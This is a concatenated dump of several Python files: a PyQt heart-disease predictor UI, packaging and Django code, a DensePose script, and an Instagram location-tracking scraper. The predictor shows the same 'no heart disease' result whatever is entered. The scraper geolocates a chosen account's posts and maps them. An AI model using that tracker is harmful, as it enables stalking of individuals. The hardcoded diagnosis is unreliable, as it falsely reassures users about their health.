self.comboBox_thal.addItem(\"\")\r\n self.comboBox_thal.addItem(\"\")\r\n self.horizontalLayout_5.addWidget(self.comboBox_thal)\r\n spacerItem21 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_5.addItem(spacerItem21)\r\n self.verticalLayout.addLayout(self.horizontalLayout_5)\r\n spacerItem22 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem22)\r\n self.horizontalLayout_6 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_6.setObjectName(\"horizontalLayout_6\")\r\n spacerItem23 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_6.addItem(spacerItem23)\r\n self.label_slope = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_slope.setObjectName(\"label_slope\")\r\n self.horizontalLayout_6.addWidget(self.label_slope)\r\n self.comboBox_slope = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n self.comboBox_slope.setObjectName(\"comboBox_slope\")\r\n self.comboBox_slope.addItem(\"\")\r\n self.comboBox_slope.addItem(\"\")\r\n self.comboBox_slope.addItem(\"\")\r\n self.horizontalLayout_6.addWidget(self.comboBox_slope)\r\n spacerItem24 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_6.addItem(spacerItem24)\r\n self.label_coves = QtWidgets.QLabel(self.verticalLayoutWidget)\r\n self.label_coves.setObjectName(\"label_coves\")\r\n self.horizontalLayout_6.addWidget(self.label_coves)\r\n self.comboBox_coves = QtWidgets.QComboBox(self.verticalLayoutWidget)\r\n self.comboBox_coves.setObjectName(\"comboBox_coves\")\r\n self.comboBox_coves.addItem(\"\")\r\n self.comboBox_coves.addItem(\"\")\r\n self.comboBox_coves.addItem(\"\")\r\n self.comboBox_coves.addItem(\"\")\r\n self.horizontalLayout_6.addWidget(self.comboBox_coves)\r\n spacerItem25 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_6.addItem(spacerItem25)\r\n self.verticalLayout.addLayout(self.horizontalLayout_6)\r\n spacerItem26 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem26)\r\n self.horizontalLayout_7 = QtWidgets.QHBoxLayout()\r\n 
self.horizontalLayout_7.setObjectName(\"horizontalLayout_7\")\r\n spacerItem27 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_7.addItem(spacerItem27)\r\n self.analyseButton = QtWidgets.QPushButton(self.verticalLayoutWidget)\r\n self.analyseButton.setMinimumSize(QtCore.QSize(150, 0))\r\n font = QtGui.QFont()\r\n font.setPointSize(8)\r\n font.setBold(True)\r\n font.setItalic(False)\r\n font.setWeight(75)\r\n self.analyseButton.setFont(font)\r\n self.analyseButton.setAutoFillBackground(False)\r\n self.analyseButton.setStyleSheet(\"background-color:green;\\n\"\r\n\"color:white;\\n\"\r\n\"border-radius:13px;\\n\"\r\n\"font:bold 14px;\\n\"\r\n\"padding: 6px;\")\r\n self.analyseButton.setObjectName(\"analyseButton\")\r\n self.horizontalLayout_7.addWidget(self.analyseButton)\r\n spacerItem28 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.horizontalLayout_7.addItem(spacerItem28)\r\n self.verticalLayout.addLayout(self.horizontalLayout_7)\r\n spacerItem29 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)\r\n self.verticalLayout.addItem(spacerItem29)\r\n self.horizontalLayout_8 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_8.setObjectName(\"horizontalLayout_8\")\r\n self.verticalLayout.addLayout(self.horizontalLayout_8)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n self.analyseButton.clicked.connect(self.show_result)\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Heart Disease Predictor\"))\r\n MainWindow.setWindowIcon(QtGui.QIcon(appctxt.get_resource('icon.png')))\r\n self.label_title.setText(_translate(\"MainWindow\", \"Heart Disease Predictor\"))\r\n self.label_age.setText(_translate(\"MainWindow\", \"Enter Age:\"))\r\n self.label_gender.setText(_translate(\"MainWindow\", \"Gender:\"))\r\n self.comboBox_gender.setPlaceholderText(_translate(\"MainWindow\", \"Select Gender\"))\r\n self.comboBox_gender.setItemText(0, _translate(\"MainWindow\", \"Male\"))\r\n self.comboBox_gender.setItemText(1, _translate(\"MainWindow\", \"Female\"))\r\n self.label_bp.setText(_translate(\"MainWindow\", \"Resting Blood Pressure:\"))\r\n self.label_cp.setText(_translate(\"MainWindow\", \"Chest Pain Type:\"))\r\n self.comboBox_cp.setPlaceholderText(_translate(\"MainWindow\", \"Chest Pain Type\"))\r\n self.comboBox_cp.setItemText(0, _translate(\"MainWindow\", \"Typical Angina\"))\r\n self.comboBox_cp.setItemText(1, _translate(\"MainWindow\", \"Atypical Angina\"))\r\n self.comboBox_cp.setItemText(2, _translate(\"MainWindow\", \"Non-anginal Pain\"))\r\n self.comboBox_cp.setItemText(3, _translate(\"MainWindow\", \"Asymptomatic\"))\r\n self.label_chol.setText(_translate(\"MainWindow\", \"Serum Cholesterol in mg/dl:\"))\r\n self.label_fbs.setText(_translate(\"MainWindow\", \"Fasting Blood Sugar in mg/dl:\"))\r\n self.label_restecg.setText(_translate(\"MainWindow\", \"Resting Electrocardiographic Results:\"))\r\n self.comboBox_restecg.setItemText(0, _translate(\"MainWindow\", \"0\"))\r\n self.comboBox_restecg.setItemText(1, _translate(\"MainWindow\", \"1\"))\r\n 
self.comboBox_restecg.setItemText(2, _translate(\"MainWindow\", \"2\"))\r\n self.label_maxhrt.setText(_translate(\"MainWindow\", \"Maximum Heart Rate Achieved:\"))\r\n self.label_exang.setText(_translate(\"MainWindow\", \"Exercise Induced Angina:\"))\r\n self.comboBox_exang.setItemText(0, _translate(\"MainWindow\", \"Yes\"))\r\n self.comboBox_exang.setItemText(1, _translate(\"MainWindow\", \"No\"))\r\n self.label_oldpeak.setText(_translate(\"MainWindow\", \"Oldpeak:\"))\r\n self.label_thal.setText(_translate(\"MainWindow\", \"Thalassemia:\"))\r\n self.comboBox_thal.setItemText(0, _translate(\"MainWindow\", \"Normal\"))\r\n self.comboBox_thal.setItemText(1, _translate(\"MainWindow\", \"Fixed Defect\"))\r\n self.comboBox_thal.setItemText(2, _translate(\"MainWindow\", \"Reversible Defect\"))\r\n self.label_slope.setText(_translate(\"MainWindow\", \"Slope of the peak exercise ST segment\"))\r\n self.comboBox_slope.setItemText(0, _translate(\"MainWindow\", \"0\"))\r\n self.comboBox_slope.setItemText(1, _translate(\"MainWindow\", \"1\"))\r\n self.comboBox_slope.setItemText(2, _translate(\"MainWindow\", \"2\"))\r\n self.label_coves.setText(_translate(\"MainWindow\", \"Number of major vessels colored by Fluoroscopy\"))\r\n self.comboBox_coves.setItemText(0, _translate(\"MainWindow\", \"0\"))\r\n self.comboBox_coves.setItemText(1, _translate(\"MainWindow\", \"1\"))\r\n self.comboBox_coves.setItemText(2, _translate(\"MainWindow\", \"2\"))\r\n self.comboBox_coves.setItemText(3, _translate(\"MainWindow\", \"3\"))\r\n self.analyseButton.setText(_translate(\"MainWindow\", \"Analyse Report\"))\r\n\r\n def show_result(self):\r\n msg = QMessageBox()\r\n msg.setWindowTitle('Result of Analysis')\r\n msg.setWindowIcon(QtGui.QIcon(appctxt.get_resource('icon.png')))\r\n msg.setText('Congratulations! You will not have a Heart Disease :)')\r\n msg.setIcon(QMessageBox.Information)\r\n\r\n x = msg.exec_()\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n #app = QtWidgets.QApplication(sys.argv)\r\n appctxt = ApplicationContext()\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n sys.exit(appctxt.app.exec_())\r\n","sub_path":"src/main/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"326116067","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\nimport re\nimport os\nfrom codecs import open\n\n\nname = \"pout\"\n\nkwargs = {\"name\": name}\n\ndef read(path):\n if os.path.isfile(path):\n with open(path, encoding='utf-8') as f:\n return f.read()\n return \"\"\n\n\nvpath = os.path.join(name, \"__init__.py\")\nif os.path.isfile(vpath):\n kwargs[\"packages\"] = find_packages(exclude=[\"tests\", \"tests.*\", \"*_test*\", \"examples\"])\nelse:\n vpath = \"{}.py\".format(name)\n kwargs[\"py_modules\"] = [name]\nkwargs[\"version\"] = re.search(r\"^__version__\\s*=\\s*[\\'\\\"]([^\\'\\\"]+)\", read(vpath), flags=re.I | re.M).group(1)\n\n\n# https://pypi.org/help/#description-content-type\nkwargs[\"long_description\"] = read('README.md')\nkwargs[\"long_description_content_type\"] = \"text/markdown\"\n\nkwargs[\"tests_require\"] = [\"testdata\"]\nkwargs[\"install_requires\"] = []\n\n\nsetup(\n description='Prints out python variables in an easy to read way, handy for debugging',\n author='Jay Marcyes',\n author_email='jay@marcyes.com',\n url='http://github.com/Jaymon/{}'.format(name),\n license=\"MIT\",\n classifiers=[ # https://pypi.python.org/pypi?:action=list_classifiers\n 'Development Status :: 4 - Beta',\n 'Environment :: Plugins',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Topic :: Software Development :: Testing',\n 'Programming Language :: Python :: 3',\n ],\n #test_suite = \"pout_test\",\n entry_points = {\n 'console_scripts': [\n# '{}.json = {}.__main__:main_json'.format(name, name),\n# '{}.char = {}.__main__:main_char'.format(name, name)\n# '{}.inject = {}.__main__:main_inject'.format(name, name)\n '{} = {}.__main__:main'.format(name, name)\n ],\n },\n **kwargs\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"521998480","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('teacher', '0002_savedupload'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='savedupload',\n name='subject',\n field=models.ForeignKey(default=None, related_name='files', to='teacher.Subject'),\n ),\n ]\n","sub_path":"teacher/migrations/0003_savedupload_subject.py","file_name":"0003_savedupload_subject.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"294982282","text":"import os\nimport numpy as np\nimport cv2\nfrom basic_lib import Get_List,ImageToIUV,IUVToImage\nfrom PIL import Image\ndef refresh(lis,data):\n for i in range(len(lis)-1):\n lis[len(lis)-i-1] = lis[len(lis)-i-2]\n lis[0] = data\n return lis\n\ndef init(img_path,pose_path,delt):\n iuv_map = np.zeros((1200, 800, 3)).astype(np.uint8)\n img = cv2.imread(img_path)\n pose = cv2.imread(pose_path)\n uv_map_new = ImageToIUV(img, pose)\n uv_map_all = [uv_map_new for i in range(delt)]\n x_tmp, y_tmp = np.where((uv_map_new[..., 0] + uv_map_new[..., 1] + uv_map_new[..., 2]) != 0)\n iuv_map[x_tmp, y_tmp, ...] = uv_map_new[x_tmp, y_tmp, ...]\n return iuv_map,uv_map_all\n\n# 利用t时刻和之前 10 帧时间的图像得到展开图\ntime_length = 10\npath_img = '/media/kun/Dataset/Pose/DataSet/new_data/video_06/img'\npath_pose = '/media/kun/Dataset/Pose/DataSet/new_data/video_06/DensePose'\nsave_root = '/media/kun/Dataset/Pose/DataSet/new_data/video_06/DensePoseProcess/uv_unwrap_part'\n\n_,name_saved = Get_List(save_root)\n_,name_all = Get_List(path_pose)\nname_all.sort()\n\n# init\nuv_map_past_all = []\nuv_map_future_all = []\nfor i in range(int(time_length/2)):\n name_img = name_all[0][:-8] + '.png'\n img = cv2.imread(os.path.join(path_img, name_img))\n pose = cv2.imread(os.path.join(path_pose, name_all[0]))\n uv_map_past_all.append(ImageToIUV(img, pose))\n\n name_img = name_all[i][:-8] + '.png'\n img = cv2.imread(os.path.join(path_img, name_img))\n pose = cv2.imread(os.path.join(path_pose, name_all[i]))\n uv_map_future_all.append(ImageToIUV(img, pose))\n\nbasic_img = './video/video_06.png'\nbasic_pose = './video/video_06_IUV.png'\nbasic_back_img = './video/video_06_back.png'\nbasic_back_pose = './video/video_06_back_IUV.png'\nbasic_IUV = ImageToIUV(cv2.imread(basic_img),cv2.imread(basic_pose))\nbasic_IUV_back = ImageToIUV(cv2.imread(basic_back_img),cv2.imread(basic_back_pose))\ntmp = basic_IUV[..., 0] + basic_IUV[..., 1] + basic_IUV[..., 2]\nx,y = np.where((tmp) == 0)\nbasic_IUV[x,y,...] = basic_IUV_back[x,y,...]\nuv_map_old = basic_IUV.copy()\n\n\n\nindex_test = 0\nfor name_index in range(len(name_all)):\n past_index = max(name_index-1,0)\n future_index = min(name_index+int(time_length/2),len(name_all)-1)\n if name_all[name_index] in name_saved:\n continue\n # 现在\n name_img = name_all[name_index][:-8] + '.png'\n img = cv2.imread(os.path.join(path_img, name_img))\n pose = cv2.imread(os.path.join(path_pose, name_all[name_index]))\n uv_map_now = ImageToIUV(img, pose)\n # a = Image.fromarray(uv_map_now).crop((0, 200, 200, 400))\n # a.show()\n # 将来\n name_img = name_all[future_index][:-8] + '.png'\n img = cv2.imread(os.path.join(path_img, name_img))\n pose = cv2.imread(os.path.join(path_pose, name_all[future_index]))\n uv_map_future = ImageToIUV(img, pose)\n\n\n tmp = uv_map_now.copy()\n for map_future,map_past in zip(uv_map_future_all,uv_map_past_all):\n x, y = np.where((uv_map_now[..., 0] + uv_map_now[..., 1] + uv_map_now[..., 2]) == 0)\n uv_map_now[x,y,...] = map_future[x,y,...]\n uv_map_now[x, y, ...] = map_past[x, y, ...]\n\n refresh(uv_map_past_all,tmp)\n refresh(uv_map_future_all, uv_map_future)\n x, y = np.where((uv_map_now[..., 0] + uv_map_now[..., 1] + uv_map_now[..., 2]) != 0)\n x_max = max(x)\n x_min = min(x)\n y_max = max(y)\n y_min = min(y)\n x, y = np.where((uv_map_now[..., 0] + uv_map_now[..., 1] + uv_map_now[..., 2]) == 0)\n x[x > x_max] = 0\n x[x < x_min] = 0\n y[y > y_max] = 0\n y[y < y_min] = 0\n uv_map_now[x,y,...] = uv_map_old[x,y,...]\n uv_map_old = uv_map_now\n # uv_map_final[x,y,...] 
= uv_map_now[x,y,...]\n # cv2.imshow('a', uv_map_now)\n # cv2.waitKey(1)\n cv2.imwrite(os.path.join(save_root, name_all[name_index]),uv_map_now)\n print(str(name_index*1.0/len(name_all)) + ' ' + str(name_index))","sub_path":"UV_unwrap_part.py","file_name":"UV_unwrap_part.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"131213747","text":"from django import forms\nfrom apps.escuela.models import Alumno, CAMPUS_CHOICES, Institucion, SECTOR_CHOICES, \\\n NIVEL_CHOICES as NIVEL_INSTITUCION_CHOICES, SUBNIVEL_CHOICES as SUBNIVEL_INSTITUCION_CHOICES, \\\n Supervisor, Periodo\n\nNIVEL_CHOICES = (\n ('','Nivel'),\n ('1','1'),\n ('2','2'),\n ('3','3'),\n)\n\nCAMPUS_CHOICES = (\n ('', 'Campus'),\n CAMPUS_CHOICES[0],\n CAMPUS_CHOICES[1],\n)\n\ndef get_institucion_choices():\n choices = [('','Institución')]\n for institucion in Institucion.objects.all().order_by('nombre'):\n choices.append((institucion.pk, institucion.nombre))\n return choices\n\n\nclass AlumnoFiltrosForm(forms.Form):\n buscar = forms.CharField(label='Nombre o matrícula', required=False, widget=forms.TextInput(attrs={'class':'form-control input-sm','placeholder':'Buscar nombre, apellido, matrícula'}))\n nivel = forms.CharField(widget=forms.Select(choices=NIVEL_CHOICES, attrs={'class':'selectpicker'}), required=False)\n # activo = forms.CharField(widget=forms.Select(choices=((True,'Activo'),(False,'Inactivo')), attrs={'class':'selectpicker'}), required=False)\n campus = forms.CharField(widget=forms.Select(choices=CAMPUS_CHOICES, attrs={'class':'selectpicker'}), required=False)\n # Comentar cuando se hagan migraciones\n institucion = forms.CharField(widget=forms.Select(choices=get_institucion_choices(), attrs={'class':'selectpicker'}))\n\nSECTOR_CHOICES_FILTRO = [\n ('','Sector'),\n]\nSECTOR_CHOICES_FILTRO.extend(SECTOR_CHOICES)\n\nNIVEL_CHOICES_FILTRO = [\n ('','Nivel'),\n]\nNIVEL_CHOICES_FILTRO.extend(NIVEL_INSTITUCION_CHOICES)\n\nSUBNIVEL_CHOICES_FILTRO = [\n ('','Subnivel'),\n]\nSUBNIVEL_CHOICES_FILTRO.extend(SUBNIVEL_INSTITUCION_CHOICES)\n\ndef get_supervisor_choices():\n choices = [('','Supervisor')]\n for supervisor in Supervisor.objects.all().order_by('usuario__nombre','usuario__apellido_paterno'):\n choices.append((supervisor.pk, supervisor.usuario.get_full_name()))\n return choices\n\nclass InstitucionFiltrosForm(forms.Form):\n buscar = forms.CharField(label='Nombre', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control input-sm', 'placeholder': 'Buscar por nombre'}))\n sector = forms.CharField(widget=forms.Select(choices=SECTOR_CHOICES_FILTRO, attrs={'class':'selectpicker'}), required=False)\n nivel = forms.CharField(widget=forms.Select(choices=NIVEL_CHOICES_FILTRO, attrs={'class':'selectpicker'}), required=False)\n subnivel = forms.CharField(widget=forms.Select(choices=SUBNIVEL_CHOICES_FILTRO, attrs={'class':'selectpicker'}), required=False)\n supervisor = forms.CharField(required=False, widget=forms.Select(attrs={'class':'selectpicker'}, choices=get_supervisor_choices()))\n nivel_practicas = forms.CharField(required=False, widget=forms.Select(attrs={'class': 'selectpicker'}, choices=(\n ('','Nivel prácticas'),\n (1,'Prácticas 1'),\n (2,'Prácticas 2'),\n (3,'Prácticas 3'),\n )))\n\nclass GrupoFiltrosForm(forms.Form):\n nivel = forms.CharField(widget=forms.Select(choices=NIVEL_CHOICES, attrs={'class': 'selectpicker'}), required=False)\n campus = forms.CharField(widget=forms.Select(choices=CAMPUS_CHOICES, attrs={'class': 'selectpicker'}),\n required=False)\n supervisor = forms.CharField(required=False,\n widget=forms.Select(attrs={'class': 'selectpicker'}, choices=get_supervisor_choices()))\n periodo = forms.ModelChoiceField(\n queryset=Periodo.objects.all().order_by('-pk'),\n widget=forms.Select(attrs={'class': 'selectpicker'}),\n initial=Periodo.objects.filter(activo=True).last().pk\n )\n\ndef 
get_instituciones_choices():\n choices = [('','Institución')]\n choices.extend(Institucion.objects.all().order_by('nombre').values_list('pk','nombre'))\n return choices\n\nclass ProyectoFiltrosForm(forms.Form):\n buscar = forms.CharField(label='Nombre del proyecto o alumno', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control input-sm', 'placeholder': 'Buscar por nombre, alumno o matrícula'}))\n institucion = forms.CharField(required=False,\n widget=forms.Select(attrs={'class': 'selectpicker'}, choices=get_instituciones_choices()))","sub_path":"apps/escuela/forms_filtros.py","file_name":"forms_filtros.py","file_ext":"py","file_size_in_byte":4274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"21416684","text":"from selenium import webdriver\nimport time\nimport re\nimport json\nimport requests\nimport sys\nimport asyncio \nimport jinja2\nfrom concurrent.futures import ThreadPoolExecutor\n\nif len(sys.argv) < 2:\n print(\"Usage: python3 instaloctrack.py \")\n exit()\n\nusername = sys.argv[1] #Instagram account to investigate\nbrowser = webdriver.Chrome('/usr/bin/chromedriver')\nbrowser.get('https://www.instagram.com/'+username+'/?hl=fr')\n\nnumber_publications = browser.find_element_by_xpath(\"/html/body\").text.strip().split(\"\\n\")[3].split(\" \")[0] \n\nspecial_chars = {\n \"\\\\u00c0\" : \"À\",\n \"\\\\u00c1\" : \"Á\",\n \"\\\\u00c2\" : \"Â\",\n \"\\\\u00c3\" : \"Ã\",\n \"\\\\u00c4\" : \"Ä\",\n \"\\\\u00c5\" : \"Å\",\n \"\\\\u00c6\" : \"Æ\",\n \"\\\\u00c7\" : \"Ç\",\n \"\\\\u00c8\" : \"È\",\n \"\\\\u00c9\" : \"É\",\n \"\\\\u00ca\" : \"Ê\",\n \"\\\\u00cb\" : \"Ë\",\n \"\\\\u00cc\" : \"Ì\",\n \"\\\\u00cd\" : \"Í\",\n \"\\\\u00ce\" : \"Î\",\n \"\\\\u00cf\" : \"Ï\",\n \"\\\\u00d1\" : \"Ñ\",\n \"\\\\u00d2\" : \"Ò\",\n \"\\\\u00d3\" : \"Ó\",\n \"\\\\u00d4\" : \"Ô\",\n \"\\\\u00d5\" : \"Õ\",\n \"\\\\u00d6\" : \"Ö\",\n \"\\\\u00d8\" : \"Ø\",\n \"\\\\u00d9\" : \"Ù\",\n \"\\\\u00da\" : \"Ú\",\n \"\\\\u00db\" : \"Û\",\n \"\\\\u00dc\" : \"Ü\",\n \"\\\\u00dd\" : \"Ý\",\n \"\\\\u00df\" : \"ß\",\n \"\\\\u00e0\" : \"à\",\n \"\\\\u00e1\" : \"á\",\n \"\\\\u00e2\" : \"â\",\n \"\\\\u00e3\" : \"ã\",\n \"\\\\u00e4\" : \"ä\",\n \"\\\\u00e5\" : \"å\",\n \"\\\\u00e6\" : \"æ\",\n \"\\\\u00e7\" : \"ç\",\n \"\\\\u00e8\" : \"è\",\n \"\\\\u00e9\" : \"é\",\n \"\\\\u00ea\" : \"ê\",\n \"\\\\u00eb\" : \"ë\",\n \"\\\\u00ec\" : \"ì\",\n \"\\\\u00ed\" : \"í\",\n \"\\\\u00ee\" : \"î\",\n \"\\\\u00ef\" : \"ï\",\n \"\\\\u00f0\" : \"ð\",\n \"\\\\u00f1\" : \"ñ\",\n \"\\\\u00f2\" : \"ò\",\n \"\\\\u00f3\" : \"ó\",\n \"\\\\u00f4\" : \"ô\",\n \"\\\\u00f5\" : \"õ\",\n \"\\\\u00f6\" : \"ö\",\n \"\\\\u00f8\" : \"ø\",\n \"\\\\u00f9\" : \"ù\",\n \"\\\\u00fa\" : \"ú\",\n \"\\\\u00fb\" : \"û\",\n \"\\\\u00fc\" : \"ü\",\n \"\\\\u00fd\" : \"ý\",\n \"\\\\u00ff\" : \"ÿ\",\n \"'\" : \"'\"\n}\n\ndef resolve_special_chars(location):\n matches = re.findall(\"(\\\\\\\\u00[\\w+]{2}|')\", location) #catch special chars\n if matches != []:\n for special_char in matches:\n location = location.replace(special_char,special_chars.get( special_char, \"\"))\n return location\n \ndef scrolls(publications): # scrolls required to snag all the data accordingly to the number of posts\n return (int(publications))//11\n #return 1 #for testing purpose\n\ndef fetch_urls(number_publications):\n links = []\n links.extend(re.findall('/p/([^/]+)/', browser.page_source)) \n n_scrolls = scrolls(number_publications)\n\n for i in range(n_scrolls): # collecting all the pictures links in order to see which ones contains location data\n print(\"Scrolling the Instagram profile, fetching pictures URLs ...\" + str(100*i//n_scrolls) + \"% of the profile scrolled \", end=\"\\r\")\n browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight)\")\n links.extend(re.findall('/p/([^/]+)/', browser.page_source)) \n time.sleep(1) # dont change this, otherwise some scrolls won't be effective and all the data won't be scrapped\n\n return list(dict.fromkeys(links)) # remove duplicates\n\ndef parse_location_timestamp(content):\n location = []\n try:\n address = re.search(r'\\\\/explore\\\\/locations\\\\/[0-9]+\\\\/([^/]+)\\\\/', content).group(1).replace(\"-\", \" \")\n address = resolve_special_chars(address)\n except:\n address= \"Error\"\n \n try:\n 
city = re.search('\"addressLocality\":\"([^\"]+)\"', content)[0].split(\":\")[1].split(\",\")[0].replace(\"\\\"\", \"\")\n #city = re.search('\"city_name\":\"([^\"]+)\"', content)[0].split(\":\")[1].split(\",\")[0].replace(\"\\\"\", \"\")\n city = resolve_special_chars(city)\n \n except:\n city = \"Error\"\n \n try:\n countrycode = re.search('Country\",\"name\":\"([^\"]+)\"', content)[0].split(\":\")[1].replace(\"\\\"\", \"\")\n countrycode = resolve_special_chars(countrycode)\n except:\n countrycode = \"Error\"\n \n location.extend([address, city, countrycode])\n\n if location != [\"Error\", \"Error\", \"Error\"]:\n tmp_timestamp = re.search('\"uploadDate\":\"([^\"]+)\"', content)[0].split('T')[0]\n return [location,re.sub('[^0-9\\-]', '', tmp_timestamp)]\n else:\n return None\n\ndef fetch_locations_and_timestamps(links):\n sys.stdout.write(\"\\033[K\")\n max_wrk = 50\n print(\"Fetching Locations and Timestamps on each picture ... \" + str(len(links)) + \" links processed asynchronously by a pool of \" + str(max_wrk) , end=\"\\r\")\n executor = ThreadPoolExecutor(max_workers=max_wrk) # didnt find any information about Instagram / Facebook Usage Policy ... people on stackoverflow say there's no limit if you're not using any API so ... ¯\\_(ツ)_/¯\n loop = asyncio.get_event_loop()\n\n async def make_requests():\n futures = [loop.run_in_executor(executor, requests.get, 'https://www.instagram.com/p/' + url) for url in links]\n await asyncio.wait(futures)\n return futures\n\n links_locations_timestamps = []\n futures = loop.run_until_complete(make_requests())\n number_locs = len(futures)\n count = 0\n\n for i in range(0, number_locs):\n content = futures[i].result().text\n location_timestamp = parse_location_timestamp(content)\n if location_timestamp != None:\n count += 1\n links_locations_timestamps.append(['https://www.instagram.com/p/'+links[i], location_timestamp[0], location_timestamp[1]])\n \n print(\"Parsing location data ... \" + str(i) + \"/\" + str(number_locs) + \" links processed... \" + \" Found location data on \" + str(count) + \" links\" , end=\"\\r\")\n tmplist = [x[0] for x in links_locations_timestamps]\n print(tmplist)\n return links_locations_timestamps\n\n\n\ndef geocode(location):\n query = \"https://nominatim.openstreetmap.org/search?\"\n if location[0] != \"Error\":\n query += \"q=\" + resolve_special_chars(location[0]) + \"&\"\n if location[1] != \"Error\":\n query += \"city=\" + location[1] + \"&\"\n if location[2] != \"Error\":\n query += \"countrycodes=\" + location[2] + \"&\"\n return requests.get(query + \"&format=json&limit=1\").json()[0]\n\ndef geocode_all(links_locations_and_timestamps):\n sys.stdout.write(\"\\033[K\")\n errors = 0\n count = 1\n gps_coordinates = []\n\n for location in links_locations_and_timestamps:\n print(\"Fetching GPS Coordinates ... : Processing location number \" + str(count) + \" out of \" + str(len(links_locations_and_timestamps)) + \" - Number of errors:\" + str(errors), end=\"\\r\")\n try:\n tmp_geoloc = geocode(location[1])\n gps_coordinates.append([tmp_geoloc['lat'], tmp_geoloc['lon']])\n except:\n print(\"An exception occurred for: \" + str(location[1]))\n errors+=1\n gps_coordinates.append(\"Error\")\n time.sleep(1) # Respect Normatim's Usage Policy! 
 (1 request per sec max) https://operations.osmfoundation.org/policies/nominatim/\n        count += 1\n\n    sys.stdout.write(\"\\033[K\")\n\n    return gps_coordinates\n\ndef export_data(links_locations_and_timestamps, gps_coordinates):\n\n    json_dump = []\n    errors = []\n\n    for i in range(0, len(links_locations_and_timestamps)):\n        links_locations_and_timestamps[i].append(gps_coordinates[i])\n        if gps_coordinates[i] != \"Error\":\n            json_dump.append({\"link\" : links_locations_and_timestamps[i][0], \"place\" : links_locations_and_timestamps[i][1], \"timestamp\" : links_locations_and_timestamps[i][2], \"gps\" : {\"lat\" : links_locations_and_timestamps[i][3][0], \"lon\" : links_locations_and_timestamps[i][3][1]}})\n        else:\n            errors.append({\"link\" : links_locations_and_timestamps[i][0], \"place\" : links_locations_and_timestamps[i][1], \"timestamp\" : links_locations_and_timestamps[i][2], \"gps\" : \"Error\"})\n    with open(username + '_instaloctrack_data.json', 'w') as filehandle:\n        json.dump(json_dump, filehandle)\n\n    with open(username + '_instaloctrack_errors.json', 'w') as filehandle:\n        json.dump(errors, filehandle)\n    print(\"Location names, timestamps, and GPS Coordinates were written to: \" + username + '_instaloctrack_data.json')\n\n    return len(json_dump), len(errors)\n\ndef map_locations():\n    templateLoader = jinja2.FileSystemLoader(searchpath=\"./\")\n    templateEnv = jinja2.Environment(loader=templateLoader)\n    template = templateEnv.get_template(\"template.html\")\n    outputText = template.render(username=username,\n                                 publications_number=number_publications,\n                                 retrieved_number=len(links_locations_and_timestamps),\n                                 mapped_number=numbers[0],\n                                 links=str([x[0] for x in links_locations_and_timestamps]),\n                                 errors_number=numbers[1],\n                                 places=str([x[1] for x in links_locations_and_timestamps]),\n                                 timestamps=str([x[2] for x in links_locations_and_timestamps]),\n                                 locations=str(gps_coordinates))\n\n    with open(username + \"_instaloctrack_map.html\", 'w') as f:\n        f.write(outputText)\n    print(\"Map with all the markers was written to: \" + username + '_instaloctrack_map.html')\n\n\nlinks = fetch_urls(number_publications)\nbrowser.quit()\nlinks_locations_and_timestamps = fetch_locations_and_timestamps(links)\ngps_coordinates = geocode_all(links_locations_and_timestamps)\nnumbers = export_data(links_locations_and_timestamps, 